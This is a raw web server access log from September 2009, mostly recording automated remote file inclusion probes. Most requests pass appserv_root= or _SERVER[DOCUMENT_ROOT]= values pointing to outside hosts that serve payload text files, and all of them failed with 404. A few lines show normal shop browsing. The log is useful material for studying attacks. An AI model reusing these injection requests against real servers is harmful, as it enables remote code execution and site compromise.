211.115.89.7 - - [23/Sep/2009:06:07:01 -0400] "GET //appserv/main.php?appserv_root=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:06:07:01 -0400] "GET /logs//appserv/main.php?appserv_root=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:06:07:01 -0400] "GET /logs/access_log.Q109051400//appserv/main.php?appserv_root=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
210.109.108.146 - - [23/Sep/2009:06:07:08 -0400] "GET /logs/access_log.Q109071600%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.cascadecollision.com////portals/fx29id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
210.109.108.146 - - [23/Sep/2009:06:07:10 -0400] "GET /logs/access_log.Q109091500%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.cascadecollision.com////portals/fx29id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:06:07:11 -0400] "GET //appserv/main.php?appserv_root=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:06:07:11 -0400] "GET /logs//appserv/main.php?appserv_root=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:06:07:11 -0400] "GET /logs/access_log.Q109051400//appserv/main.php?appserv_root=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
58.6.5.184 - - [23/Sep/2009:06:07:13 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76380 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
211.115.89.7 - - [23/Sep/2009:06:07:14 -0400] "GET //appserv/main.php?appserv_root=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:06:07:14 -0400] "GET /logs//appserv/main.php?appserv_root=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:06:07:14 -0400] "GET /logs/access_log.Q109051400//appserv/main.php?appserv_root=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
58.6.5.184 - - [23/Sep/2009:06:07:16 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
58.6.5.184 - - [23/Sep/2009:06:07:16 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
